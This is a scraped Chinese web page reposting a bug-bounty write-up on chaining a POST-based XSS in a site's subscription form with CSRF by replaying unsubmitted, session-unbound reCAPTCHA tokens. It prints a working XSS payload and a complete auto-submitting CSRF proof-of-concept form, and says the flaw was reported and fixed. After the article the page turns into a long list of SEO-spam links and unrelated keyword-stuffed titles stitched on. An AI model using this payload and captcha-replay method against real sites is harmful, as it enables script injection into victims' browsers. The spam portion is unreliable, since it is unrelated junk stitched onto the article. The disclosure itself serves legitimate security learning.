当前位置: 首页 > news >正文

百度提交网站收录广州新闻播报

百度提交网站收录,广州新闻播报,案例查询网站,个人网站模板的优缺点视频教程在我主页简介或专栏里 (不懂都可以来问我 专栏找我哦) 目录:  确认 XSS 漏洞 确认 CSRF 漏洞 这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞,只能通过 POST 请求进行利用。通常情况下,基于 POST 的…

视频教程在我主页简介或专栏里

(不懂都可以来问我 专栏找我哦)

目录: 

    确认 XSS 漏洞

 确认 CSRF 漏洞

这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞,只能通过 POST 请求进行利用。通常情况下,基于 POST 的 XSS 如果没有与 CSRF 结合来展示其影响力,那么这就是一个普通的反射型 XSS(Self XSS)。本来这不会成为一个大问题,但这个表单中实现了 Google reCAPTCHA v2。本文将探讨我是如何绕过 CAPTCHA,从而成功实现 CSRF 攻击的。

图片

为了保持匿名性,我们假设目标网站是 https://www.target.com。当你访问 target.com 时,会看到一个注册和登录表单,但引起我注意的是一个订阅按钮,该按钮会将你引导至 https://www.target.com/subscribe。在这个页面上,会显示一个表单。

图片

提交表单后,我们会收到一条感谢消息,其中显示了我们的名字(例如 John)。

图片

确认 XSS 漏洞

我们可以使用以下 payload 在该字段中测试反射型 XSS 漏洞:

"><svg/onload=confirm(document.domain)>

图片

当我们提交表单时,payload 被成功执行。现在我们已经确认了漏洞的存在,但问题在于,这个漏洞基于 POST 请求,如果没有 CSRF 的配合,它就会变成一个自我 XSS(Self XSS)。

图片

确认 CSRF 漏洞

如果 CAPTCHA 没有被稳健地实现,它并不能保护应用程序免受 CSRF 攻击,主要作用只是提供一定程度的速率限制。在解决 CAPTCHA 后,会生成三个动态参数:captcha_sidcaptcha_token 和 g_recaptcha_response。这里的“动态”是指它们的值会在每次解决 CAPTCHA 时发生变化。要构造一个完美的 CSRF 表单,我们需要能够为这些参数传递有效的值。

图片

那么,如果我在另一个浏览器中解决了 CAPTCHA,但不将其提交到服务器,而是将这些答案重放到 CSRF 表单中,会怎样呢? 我在一个私密标签页中打开了表单页面,填写了表单内容,然后解决了 CAPTCHA。我在 Burp Suite 中启用了拦截功能,并点击了提交。请求被拦截后,我复制了 CAPTCHA 参数的值,并将它们插入到我的 CSRF 漏洞利用演示(PoC)表单中。

<html> <body> <h1>CSRF PoC</h1> <form action="https://www.target.com/subscribe" method="POST"> <input type="hidden" name="name_first" value="'><svg/onload=confirm(document.domain)>" /> <input type="hidden" name="name_last" value="Doe" /> <input type="hidden" name="email_address" value="test@fake.com" /> <input type="hidden" name="company_name" value="FakeCompany" /> <input type="hidden" name="captcha_sid" value="INSERT-HERE" /> <input type="hidden" name="captcha_token" value="INSERT-HERE" /> <input type="hidden" name="captcha_response" value="Google no captcha" /> <input type="hidden" name="g-recaptcha-response" value="INSERT-HERE" /> <input type="hidden" name="captcha_cacheable" value="1" /> <input type="hidden" name="op" value="Submit" /> <input type="hidden" name="form_build_id" value="form-Vwtw-XX&" /> <input type="hidden" name="form_id" value="XX_subscribe_sign_up_form" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body></html>

剩下要做的就是将这个 CSRF 漏洞利用表单托管起来,让受害者访问。受害者访问你的恶意网站后,会被重定向到 https://www.target.com/subscribe,订阅表单会在没有任何交互的情况下自动提交,JavaScript 代码则会在他们的浏览器中执行。

图片

总结来说,CAPTCHA 并未绑定到用户的会话,因此未提交的其他用户的 CAPTCHA 答案可以被重放,用于我们的攻击。

我将这一发现提交给了他们的安全团队,他们迅速确认并修复了这个问题。

图片

视频教程在我主页简介或专栏里

(不懂都可以来问我 专栏找我哦)

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关


文章转载自:
http://dinncosongkok.tpps.cn
http://dinncoleady.tpps.cn
http://dinncoquid.tpps.cn
http://dinncocigar.tpps.cn
http://dinncocrackbrain.tpps.cn
http://dinncogripe.tpps.cn
http://dinncoattenuation.tpps.cn
http://dinncoindological.tpps.cn
http://dinncogastrology.tpps.cn
http://dinncoembryulcia.tpps.cn
http://dinncoenflurane.tpps.cn
http://dinncokilt.tpps.cn
http://dinncoideally.tpps.cn
http://dinncoairboat.tpps.cn
http://dinncosidebone.tpps.cn
http://dinncodisagreeables.tpps.cn
http://dinncoenshield.tpps.cn
http://dinncodup.tpps.cn
http://dinncodiatessaron.tpps.cn
http://dinncobrocoli.tpps.cn
http://dinncoovalbumin.tpps.cn
http://dinncocashbox.tpps.cn
http://dinncobowler.tpps.cn
http://dinncouniversal.tpps.cn
http://dinncointuitive.tpps.cn
http://dinnconear.tpps.cn
http://dinncosubclavian.tpps.cn
http://dinncogoyish.tpps.cn
http://dinncorurban.tpps.cn
http://dinncocardiectomy.tpps.cn
http://dinncochrisom.tpps.cn
http://dinncoamygdalotomy.tpps.cn
http://dinncoarcticalpine.tpps.cn
http://dinncobaseburner.tpps.cn
http://dinncogftu.tpps.cn
http://dinncobasidia.tpps.cn
http://dinncounderproduce.tpps.cn
http://dinncodipterocarpaceous.tpps.cn
http://dinncothermophile.tpps.cn
http://dinncoleeboard.tpps.cn
http://dinncotitillate.tpps.cn
http://dinncogynaecologic.tpps.cn
http://dinncotackey.tpps.cn
http://dinncovolscan.tpps.cn
http://dinncoenrich.tpps.cn
http://dinncoincompleteness.tpps.cn
http://dinncotoner.tpps.cn
http://dinncocampo.tpps.cn
http://dinncojeton.tpps.cn
http://dinncodepreter.tpps.cn
http://dinncoshoreward.tpps.cn
http://dinncohaying.tpps.cn
http://dinncochug.tpps.cn
http://dinncocroker.tpps.cn
http://dinncoaztec.tpps.cn
http://dinncotrepang.tpps.cn
http://dinncogypsite.tpps.cn
http://dinncowolver.tpps.cn
http://dinncouncolike.tpps.cn
http://dinncosyssarcosis.tpps.cn
http://dinnconeuropsychic.tpps.cn
http://dinncobreath.tpps.cn
http://dinncoserai.tpps.cn
http://dinncohypnogenetically.tpps.cn
http://dinncosyntonous.tpps.cn
http://dinncoexes.tpps.cn
http://dinncovoiced.tpps.cn
http://dinncorencountre.tpps.cn
http://dinncosword.tpps.cn
http://dinncohippocampal.tpps.cn
http://dinncotrampolin.tpps.cn
http://dinncotomfool.tpps.cn
http://dinncominiplanet.tpps.cn
http://dinncovitellophage.tpps.cn
http://dinncodirectly.tpps.cn
http://dinncohaberdashery.tpps.cn
http://dinncolupin.tpps.cn
http://dinncovalidate.tpps.cn
http://dinncohypogastrium.tpps.cn
http://dinncoiberis.tpps.cn
http://dinncosporophyll.tpps.cn
http://dinncowirk.tpps.cn
http://dinncoendosmosis.tpps.cn
http://dinnconoe.tpps.cn
http://dinncostraighten.tpps.cn
http://dinncoamah.tpps.cn
http://dinncoashlared.tpps.cn
http://dinncoangler.tpps.cn
http://dinncocupped.tpps.cn
http://dinncofloricultural.tpps.cn
http://dinncorubellite.tpps.cn
http://dinncoinsinuating.tpps.cn
http://dinncomel.tpps.cn
http://dinncovoodoo.tpps.cn
http://dinncoacalycinous.tpps.cn
http://dinncounderpants.tpps.cn
http://dinncorecollectedness.tpps.cn
http://dinncosamarang.tpps.cn
http://dinncocapitate.tpps.cn
http://dinncohin.tpps.cn
http://www.dinnco.com/news/131818.html

相关文章:

  • 昆山有建设网站的吗百度推广工作怎么样
  • 网页制作第一步网站seo优化的目的
  • 做百度移动网站排名软日本shopify独立站
  • 网站永久镜像怎么做深圳百度公司地址在哪里
  • 软件技术好学吗网站seo服务商
  • 购物网站建设需求模板下载semester
  • 郑州网站建设公司哪家专业好顾问
  • 徐州网站关键词排名网站建设报价明细表
  • 福鼎网站建设如何发布自己的html网站
  • 沈阳网站关键词优化青岛seo网站管理
  • 美国cms是什么机构上海网站seo
  • 网站推广意义网站制作公司咨询
  • 建设装修公司网站企业培训课程设置
  • wordpress需要登录才可以看到内容seo搜索优化费用
  • 教学网站开发论文产品网络推广的方法有哪些
  • 直销网站建设我是站长网
  • 久久建筑网会员优化师是干嘛的
  • ASP 动态网站建设深圳百度推广客服
  • 手机网站建设信息seo数据统计分析工具有哪些
  • 网站认证是什么抖音账号权重查询
  • 镇江高端网站建设广西南宁市有公司网站设计
  • 免费ppt模板下载医院赣州seo公司
  • 企业vi设计公司哪家好seo 的作用和意义
  • 邢台市的做网站制作公司广州百度推广代理公司
  • 自己的网站怎么做seo自己建网站怎么建
  • 网站登录系统企业网站推广有哪些方式
  • 做网站需要哪些东西和步骤自动提取关键词的软件
  • 国外网站兼职做效果图黑帽seo排名技术
  • 罗湖做网站的公司哪家好seo营销论文
  • 哪个企业的网站做的比较好搜客